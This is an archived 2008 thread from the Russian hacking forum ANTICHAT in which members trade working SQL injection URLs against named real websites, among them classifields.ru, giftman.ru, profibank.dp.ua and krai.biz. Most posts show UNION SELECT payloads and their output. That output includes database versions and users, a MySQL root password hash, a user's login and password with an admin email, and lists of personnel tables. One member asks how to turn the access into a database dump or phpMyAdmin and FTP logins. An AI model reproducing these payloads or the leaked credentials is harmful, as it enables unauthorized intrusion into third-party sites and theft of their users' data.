ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
23.03.2008, 15:56
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Ура получилось, не терпиливый я ЛОХ...
|
|
|
23.03.2008, 16:11
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Ребят, а что дальше то делать? Ну получил я DATABASE(), USER(), VERSION() и LOAD_FILE('/etc/passwd')! Но что с этим добром делать, мне нужен просто дам базы данных либо вход через phpmyadmin либо аккаунт ftp
Помогите плис  |
|
|
|
23.03.2008, 16:32
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
мде,искал се сумку в инет шопах,а нашел sql inc=)
хотя это и не инет шоп,но все же
http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*
5.1.16-beta
catalog1
catalog1@localhost
|
|
|
|
23.03.2008, 16:37
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от bag
мде,искал се сумку в инет шопах,а нашел sql inc=)
хотя это и не инет шоп,но все же
http://www.classifields.ru/?field=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16/*
5.1.16-beta
catalog1
catalog1@localhost
Немножко дополню
http://www.classifields.ru/?field=9999+UNION+SELECT+1,concat_ws(0x2F,user,pas sword),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+mys ql.user/*
получаем
root/*7030b624ca16e7dc266e074669aab3a65fad955a
|
|
|
|
23.03.2008, 16:44
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
Провел на форуме:
5866479
Репутация:
1809
|
|
Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5, 6,7+from+mysql.user/*" ?
|
|
|
|
23.03.2008, 16:46
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Сообщение от mff
Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5, 6,7+from+mysql.user/*" ?
хорош тут уже фигней страдать,сходи почитай статтьи на этом сайте все есть,
а вообще вот
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2F,user,password),5,6,7+from+mysql.user/*
|
|
|
|
25.03.2008, 09:34
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
Сообщение от bag
а вообще вот
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2F,user,password),5,6,7+from+mysql.user/*
Поковырялся дальше...
http://giftman.ru/news_view.php?news_id=9999+union+select+1,2,3,conc at_ws(0x2A,login,pwd_hash,email),5,6,7+FROM+u15364 .ra_users/*
|
|
|
|
23.03.2008, 16:47
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
Провел на форуме:
839509
Репутация:
338
|
|
Сообщение от mff
Ребят а что означает - "Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'" на запрос - "id=9999+union+select+1,2,3,mysql.user.password,5, 6,7+from+mysql.user/*" ?
Блин тут не надо писать вопросы, вот ТУТ задавай вопросы!
|
|
|
|
23.03.2008, 18:40
|
|
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283
Репутация:
69
|
|
http://profibank.dp.ua/view_choicelnew.php?NumNews=-27+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user())/*
5.0.22-log  rofibank2_jobagency:bobunenko@localhost приглянувшиеся таблицы
authorize
countchildren
directortable
dolzhnost
drivepass
education
formanayma
graphicjob
marrige
users
vladcomp
vladlan
http://profibank.dp.ua/view_choicelnew.php?NumNews=-27+union+select+1,2,3,4,password+from+users+limit+ 1,1/*
дима:дима:admin@profibank.dp.ua
---------------------------------------------------------------------
---------------------------------------------------------------------
БIЗНЕС-ПОРТАЛ
CЛАВУТЧИНИ
http://krai.biz/news.php?show=-89/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4, 5,6,7/*
5.0.22-log:kraibiz@localhost:Comissar42_krai
http://krai.biz/news.php?show=-89/**/union/**/select/**/1,2,3,concat_ws(0x3a,login,password,email),5,6,7/**/from/**/users/**/limit/**/1,1/*
----------------------------------------------------------------------
---------------------------------------------------------------------
skyinform
мы знаем все об авиаперевозах
http://skyinform.com.ua/?page=st&id=7+union+select+1,2,concat_ws(0x3a,vers ion(),database(),user()),4,5/*
5.0.22-log:gust2_sky:gust@localhost
есть доступ к information_schema.tables
Последний раз редактировалось samarin; 24.03.2008 в 01:18..
|
|
|
|
23.03.2008, 19:16
|
|
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851
Репутация:
46
|
|
Код:
http://www.comexus.org.mx/Summer/participants.php?id=-1+union+select+version()/*
VERSION: 5.0.27-standard
USER: cmeadmin_comexus@comexus.org.mx
DATABASE: cmeadmin_comexusonline
PR: 6 |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид